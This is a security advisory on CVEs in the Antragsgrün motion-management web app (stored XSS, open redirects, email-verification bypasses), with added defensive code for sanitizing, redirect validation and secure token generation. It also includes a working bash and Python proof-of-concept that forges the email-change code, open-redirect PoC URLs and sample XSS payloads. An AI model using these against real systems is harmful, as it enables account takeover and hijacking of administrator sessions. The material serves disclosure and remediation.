X41 D-Sec GmbH Security Advisory: X41-2024-002
Multiple Vulnerabilities in Antragsgrün
Highest Severity Rating: High
Version: 4.14.0
Confirmed Affected Versions: Commit 9c1ab3ca391eb66023b30d45e87c24589367ab6c
Confirmed Patched Versions: 4.14.2
Vendor: Tobias Hößl
Vendor URL: https://antragsgruen.de/
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2024-002-antragsgruen/
Summary and Impact
X41 identified a stored XSS issue in Antragsgrün that can be triggered by unauthenticated users to attack administrative users and allows performing actions as administrative users. Additionally, two open redirects and issues which circumvent the email verification process were identified.
Product Description
From the vendor homepage:
Antragsgrün offers a clear and efficient tool for the effective administration of resolutions, motions, amendments, and candidacies: from the submission of motions to the vote and the drafting of the resolution.
Many organizations are already using the tool successfully such as the European Youth Forum, the German and European Green Party, and the National Council of German Women’s Organizations. It can be easily adapted to a variety of scenarios.
Stored XSS in Motion Reason
Severity Rating: High
Vector: XSS
CVE: CVE-2024-46884
CWE: 80 - Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
CVSS Score: 9.6
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Analysis
Anonymous users are often allowed to create new motions in Antragsgrün. After creating a motion, it is possible to go back and edit it via https://antragsgruen/std/motionname-id/edit. The optional field reason is not properly filtered against XSS attacks. The reason is passed to the application via the parameter sections[10] and can be used for XSS injections. The XSS triggers when an administrator handles the motion and allows normal users to hijack the administrator's session. The XSS can also be triggered after publication by visiting the HTML view via https://antragsgruen/std/motionname-id/plainhtml.
Other fields are not filtered either when using the edit endpoint.
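As an added illustration (example code written for this page, not Antragsgrün's own filter), the following Python sanitizer shows the allowlist approach a rich-text field such as the reason needs: tags and attributes not on an allowlist are dropped, script and style bodies are removed entirely, href values are restricted to http, https and mailto, and text is re-escaped. The tag and attribute lists are assumptions chosen for the example; a production deployment would use a maintained library such as HTML Purifier with an equivalent configuration.

```python
"""Added illustration: allowlist HTML filtering for a rich-text field such as
the motion "reason". Example code written for this page, not Antragsgrün's
own filter; the tag and attribute lists below are assumptions."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed allowlist for a motion reason: basic formatting and links only.
ALLOWED_TAGS = {"p", "br", "strong", "em", "u", "s", "ul", "ol", "li", "blockquote", "a"}
ALLOWED_ATTRS = {"a": {"href"}}          # no on*, style, src or id anywhere
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}


def safe_href(value):
    """Reject javascript:, data: and similar schemes; tolerate the
    tab/newline tricks browsers strip before parsing a URL."""
    if value is None:
        return False
    cleaned = "".join(ch for ch in value if ch not in "\t\r\n").strip()
    return urlsplit(cleaned).scheme.lower() in SAFE_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Re-serialises input keeping only allowlisted tags and attributes;
    other elements are dropped (their text is kept) and text is escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.stack = []      # open allowlisted tags, so output stays balanced
        self.skip = 0        # >0 while inside an element dropped with content

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1
            return
        if self.skip or tag not in ALLOWED_TAGS:
            return               # unknown tag (img, div, ...): drop the tag itself
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue         # onerror=, onclick=, style=, ... never survive
            if name == "href" and not safe_href(value):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)     # <br/> handled like <br>

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
            return
        if self.skip or tag not in self.stack:
            return               # stray or non-allowlisted closing tag
        while self.stack:        # close anything still open inside it
            open_tag = self.stack.pop()
            self.out.append(f"</{open_tag}>")
            if open_tag == tag:
                break

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))

    def result(self):
        self.close()
        while self.stack:        # balance tags the input left open
            self.out.append(f"</{self.stack.pop()}>")
        return "".join(self.out)


def sanitize_reason(raw_html):
    """Filter an untrusted 'reason' value before storing or rendering it."""
    parser = AllowlistSanitizer()
    parser.feed(raw_html)
    return parser.result()


if __name__ == "__main__":
    # Constructed payloads of the kind a tampered sections[...] field could carry.
    for payload in ('<p>Because <strong>we</strong> must.</p>',
                    '<img src=x onerror="alert(document.cookie)">',
                    '<a href="javascript:alert(1)">click</a>',
                    '<script>fetch("/admin")</script>visible'):
        print(repr(payload), "->", repr(sanitize_reason(payload)))
```

The sanitizer must run on the server at the edit endpoint as well as at creation, since the advisory's point is that the edit path lacks the filtering; output-side escaping in the plainhtml view would not help for a field that is meant to carry markup.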
Proof of Concept
Tamper with the data submitted to https://antragsgruen/std/motionname-id/edit, placing the payload in the reason field (parameter sections[10]).
Workarounds
Only allow registered users to submit motions to mitigate the attack vector to some extent.
Open Redirect in Login and Logout
Severity Rating: Medium
Vector: Open URL redirect
CVE: CVE-2024-46882
CWE: 601 - URL Redirection to Untrusted Site
CVSS Score: 6.1
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Analysis
Two open URL redirects were discovered in the web application. The logout redirect will instantly redirect the user to an attacker-controlled webpage, which makes phishing attacks easier. An attacker can send a link to a user of the application, potentially having them believe they are opening the application when it will, in fact, redirect them to a page controlled by the attacker. The page could pretend to be Antragsgruen’s login page, or another page that suits the attacker’s goal.
Proof of Concept
https://antragsgruen/logout?backUrl=https://x41-dsec.de
https://antragsgruen/login?backUrl=https://x41-dsec.de
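The following validation, added here as example code (not the project's own backUrl handling; the origin https://antragsgruen.example is a placeholder), shows how a redirect parameter can be restricted to the application's own origin. It rejects the two proof-of-concept URLs above as well as the scheme-relative, backslash and userinfo variants that naive prefix checks miss.

```python
"""Added illustration: validating a backUrl-style redirect target. Example
code written for this page, not Antragsgrün's own handling; the origin
"https://antragsgruen.example" used in the demo is a placeholder."""
from urllib.parse import urlsplit


def safe_back_url(back_url, app_origin, default="/"):
    """Return back_url only if it stays on the application, else default.

    app_origin is the configured scheme://host[:port] of the deployment;
    never derive it from the request's Host header, which the attacker
    also controls.
    """
    if not back_url:
        return default
    # Browsers drop tab/CR/LF inside URLs and trim surrounding whitespace
    # before parsing, so normalise the same way before deciding.
    candidate = "".join(ch for ch in back_url if ch not in "\t\r\n").strip()
    try:
        parts = urlsplit(candidate)
    except ValueError:           # e.g. malformed IPv6 brackets
        return default
    origin = urlsplit(app_origin)
    if parts.scheme or parts.netloc:
        # Absolute (or scheme-relative "//host") URL: exact origin match only.
        # This also rejects javascript:, data: and "https://app@evil" tricks,
        # since netloc then still contains the userinfo part.
        if parts.scheme.lower() != origin.scheme.lower():
            return default
        if parts.netloc.lower() != origin.netloc.lower():
            return default
        return candidate
    # Relative target: a single leading "/" only. "//host" was caught above;
    # "/\host" and "///host" are treated as network paths by some browsers.
    if not candidate.startswith("/") or candidate.startswith(("//", "/\\")):
        return default
    return candidate


if __name__ == "__main__":
    origin = "https://antragsgruen.example"
    # The advisory's proof-of-concept target next to legitimate ones.
    for target in ("https://x41-dsec.de", "//x41-dsec.de/", "/\\x41-dsec.de",
                   "javascript:alert(1)", "/std/motion-1/edit",
                   "https://antragsgruen.example/login"):
        print(f"{target!r:45} -> {safe_back_url(target, origin)!r}")
```

Allowing only relative paths (dropping the absolute-URL branch entirely) is simpler still and is enough for the login and logout flows, where the target is always a page of the same application.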
Workarounds
No workaround is currently known.
Email Verification Bypass After Sign-up
Severity Rating: Medium
Vector: Authentication
CVE: CVE-2024-46883
CWE: 287 - Improper Authentication
CVSS Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Credit: X41 D-Sec GmbH, Yassine El Baaj
Analysis
After users sign up, they are redirected to a page where they are expected to enter a code that has been sent by email to validate their account. This can be bypassed by simply clicking on another component of the user interface, for example the home button: the user is effectively logged in before completing the verification step. In addition, X41 noticed that browsing the application with a non-verified account had no impact on its functionality, meaning that a non-verified user could do anything a verified one could.
Workarounds
No workaround is currently known.
Email Verification Bypass After Email Change
Severity Rating:
Vector: Email Verification
CVE: CVE-2024-46883
CWE: 345 - Insufficient Verification of Data Authenticity
CVSS Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Credit: X41 D-Sec GmbH, Yassine El Baaj, JM
Analysis
When a user requests a change of their email address, a random code is sent to the new address which they have to enter in order to prove access to the new address. This code is generated in createEmailChangeToken() in models/db/User.php as follows:
public function createEmailChangeToken(string $newEmail, int $timestamp): string
{
// [...]
$key = $newEmail . $timestamp . $this->id . $this->authKey;
return substr(sha1($key), 0, 10);
}
All of the components are known to the user. The id and authKey are static values from the database and part of the _identity cookie.
This makes it trivial for a user to generate the required code and change the email address to an address they don’t have access to.
Proof of Concept
X41 has successfully used the following script to generate the required code given the desired email address, the server's Date response header, and values from the _identity cookie.
#!/bin/bash
# Recomputes substr(sha1($newEmail . $timestamp . $this->id . $this->authKey), 0, 10)
# from values the client already holds. Requires GNU date (-d) and sha1sum.
read -rp 'Email to change to: ' email
read -rp 'Date header value: ' datestr
read -rp 'User ID (first entry of _identity cookie array): ' id
# -r keeps the JSON escapes (\u0000) literal; echo -e below decodes them
# into the raw bytes that PHP concatenates.
read -rp 'AuthKey (second entry, including \u0000s): ' authkey
dateint=$(date -d "$datestr" +%s)
raw="${email}${dateint}${id}${authkey}"
# The server's time() may fall one second before the Date header, so try both.
alt_raw="${email}$((dateint-1))${id}${authkey}"
echo ---
echo -ne "exact time:\t"
echo -ne "$raw" | sha1sum | head -c 10
echo
echo -ne "minus 1s:\t"
echo -ne "$alt_raw" | sha1sum | head -c 10
echo
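As an added illustration for the weak derivation in createEmailChangeToken() and the shell proof of concept above (example code written for this page, not Antragsgrün's code or its fix; the user id, authKey and addresses are constructed), the following Python port recomputes the code for a window of timestamps around the Date header, generalising the script's "exact second or one second earlier", and sets a hardened verifier beside it: a random code from the CSPRNG, stored only as a hash bound to the user and the new address, with expiry, single use and a bounded number of attempts.

```python
"""Added illustration: why the email-change code computed by
createEmailChangeToken() is predictable from values the client already
holds, and one hardened alternative. Example code written for this page,
not Antragsgrün's; sample id, authKey and addresses are constructed."""
import hashlib
import hmac
import secrets
import time
from datetime import timezone
from email.utils import parsedate_to_datetime


def weak_change_code(new_email, timestamp, user_id, auth_key):
    """Port of substr(sha1($newEmail . $timestamp . $this->id . $this->authKey), 0, 10).

    PHP concatenates the raw authKey bytes, NUL bytes included, so auth_key
    must be the decoded cookie value (e.g. "ab\\x00cd"), not its JSON-escaped
    form "ab\\u0000cd".
    """
    key = f"{new_email}{timestamp}{user_id}{auth_key}".encode("utf-8")
    return hashlib.sha1(key).hexdigest()[:10]


def header_to_unix(date_header):
    """Unix time of an HTTP Date header such as 'Sun, 01 Sep 2024 07:20:00 GMT'."""
    dt = parsedate_to_datetime(date_header)
    if dt.tzinfo is None:          # some Python versions return a naive value
        dt = dt.replace(tzinfo=timezone.utc)
    return int(dt.timestamp())


def candidate_codes(new_email, date_header, user_id, auth_key, slack=2):
    """Codes an attacker would submit, given the server's Date header.

    The advisory's shell script tries the exact second and one second
    earlier; this widens that to +/- slack seconds, since the server's
    time() call need not fall in the same second as the header value.
    """
    t = header_to_unix(date_header)
    return {weak_change_code(new_email, ts, user_id, auth_key)
            for ts in range(t - slack, t + slack + 1)}


class EmailChangeVerifier:
    """Hardened alternative (assumed design, not the vendor's fix): the code is
    drawn from the CSPRNG, only a hash bound to the user and target address is
    stored, it expires, and it is single use with a bounded number of attempts."""

    CODE_TTL = 15 * 60
    MAX_ATTEMPTS = 5

    def __init__(self):
        self._pending = {}   # user_id -> [new_email, digest, expires_at, attempts]

    @staticmethod
    def _digest(user_id, new_email, code):
        return hashlib.sha256(f"{user_id}\x00{new_email}\x00{code}".encode()).hexdigest()

    def issue(self, user_id, new_email, now=None):
        now = time.time() if now is None else now
        code = f"{secrets.randbelow(10 ** 8):08d}"    # 8 random digits
        self._pending[user_id] = [new_email, self._digest(user_id, new_email, code),
                                  now + self.CODE_TTL, 0]
        return code   # sent to new_email only; the client cannot recompute it

    def verify(self, user_id, new_email, code, now=None):
        now = time.time() if now is None else now
        entry = self._pending.get(user_id)
        if entry is None:
            return False
        stored_email, digest, expires_at, attempts = entry
        if now > expires_at:
            del self._pending[user_id]
            return False
        ok = stored_email == new_email and hmac.compare_digest(
            digest, self._digest(user_id, new_email, code))
        if not ok:
            entry[3] = attempts + 1
            if entry[3] >= self.MAX_ATTEMPTS:
                del self._pending[user_id]     # force a fresh code
            return False
        del self._pending[user_id]             # single use
        return True


if __name__ == "__main__":
    # Constructed values standing in for the _identity cookie contents.
    email, uid, auth_key = "attacker-chosen@example.org", 42, "k3y\x00\x00abc"
    header = "Sun, 01 Sep 2024 07:20:00 GMT"
    print("predictable codes:", sorted(candidate_codes(email, header, uid, auth_key)))
    v = EmailChangeVerifier()
    code = v.issue(uid, email, now=0.0)
    print("random code accepted once:", v.verify(uid, email, code, now=1.0),
          v.verify(uid, email, code, now=2.0))
```

The attempt limit matters as much as the randomness: an 8-digit code with unlimited tries is brute-forceable, so the verifier discards the pending change after MAX_ATTEMPTS failures and the application should additionally rate-limit the endpoint.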
Workarounds
No workaround is currently known.
Timeline
2024-07-24 Issue identified
2024-08-27 Vendor contacted
2024-08-27 Vendor reply
2024-09-08 Fixed version released
2024-09-09 Advisory release
2024-09-09 CVE ID Requested
2024-09-12 CVE ID Assigned
About X41 D-Sec GmbH
X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and IT security consulting and support services are core competencies of X41.